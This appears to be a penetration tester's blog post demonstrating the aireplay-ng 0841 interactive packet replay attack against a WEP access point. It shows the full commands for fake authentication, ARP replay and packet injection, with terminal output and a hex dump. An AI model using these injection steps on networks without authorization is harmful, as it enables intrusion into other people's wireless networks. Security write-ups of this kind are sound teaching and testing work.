This week I wanted to cover the aireplay 0841 attack, or interactive packet replay. I know that this is yet another wireless post, but I’ve been on a few wireless engagements recently!
Aireplay 0841 Attack – Introduction
For those of you not familiar, interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working.
If you would like some more information, then you can also read the following write-up.
Attempting ARP Replay
First, I sent a fake authentication request to the target access point.
root@kali:~# aireplay-ng -1 0 -e TargetAP -a FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1 18:07:45 Waiting for beacon frame (BSSID: FC:5B:xx:xx:xx:xx) on channel 11 18:07:45 Sending Authentication Request (Open System) [ACK] 18:07:45 Authentication successful 18:07:45 Sending Association Request [ACK] 18:07:45 Association successful 🙂 (AID: 1)
Next, I attempted an ARP Replay attack. Unfortunately, I received 0 ARP requests even after 205,000 packets.
root@kali:~# aireplay-ng --arpreplay -b FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1 For information, no action required: Using gettimeofday() instead of /dev/rtc 18:03:37 Waiting for beacon frame (BSSID: FC:5B:xx:xx:xx:xx) on channel 11 Saving ARP requests in replay_arp-1031-180337.cap You should also start airodump-ng to capture replies. Read 205379 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps) ^C
Enter the Aireplay 0841 Attack
As an ARP Replay attack was not working, it was time to try the 0841 attack.
First, I needed to capture a packet with the “To Distribution System” flag set. Once I captured a packet, hitting the “y” key saved the packet and started to replay it on the network.
root@kali:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1 For information, no action required: Using gettimeofday() instead of /dev/rtc Read 856 packets... Size: 118, FromDS: 1, ToDS: 0 (WEP) BSSID = FC:5B:xx:xx:xx:xx Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 4C:34:88:2C:23:6A 0x0000: 0842 0000 ffff ffff ffff fc5b 3969 0062 .B.........[9i.b 0x0010: 4c34 882c 236a 3058 713d 8a80 82c7 724b L4.,#j0Xq=....rK 0x0020: df97 716b 5223 a570 e093 b405 faac bde5 ..qkR#.p........ 0x0030: 74bf 43d5 8047 377f c79c cbf4 b8e3 48e3 t.C..G7......H. 0x0040: 07e7 18f5 6ce9 b454 d6a4 1f46 acf9 81fd ....l..T...F.... 0x0050: b5d3 299b 55e4 6a85 cb35 cc17 2cfe ea13 ..).U.j..5..,... 0x0060: 32d8 0f9e 8990 cb3f 2b01 1ea1 b3d0 7f64 2......?+.....d 0x0070: 51e6 e547 06ab Q..G.. Use this packet ? y Saving chosen packet in replay_src-1031-180750.cap You should also start airodump-ng to capture replies. Sent 27144 packets...(499 pps)
As you can see, I was now receiving data packets (albeit a bit slowly) on the network!
CH 11 ][ Elapsed: 12 mins ][ 2017-10-31 18:10 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AU FC:5B:xx:xx:xx:xx -32 2 3412 116 0 11 54e. WEP WEP40 OP BSSID STATION PWR Rate Lost Frames Probe FC:5B:xx:xx:xx:xx 00:C0:CA:8D:89:75 0 9 - 1 4858 74695
Unfortunately, I was unable to crack this specific key even after 50k IVs. That said, you can crack this key with aircrack the same way you would a normal WEP pcap file.
Aireplay 0841 Attack – Conclusion
While I wasn’t able to crack this particular key, hopefully you were able to learn a new WEP attack.
Next week will be another non-wireless post finally, so be on the lookout!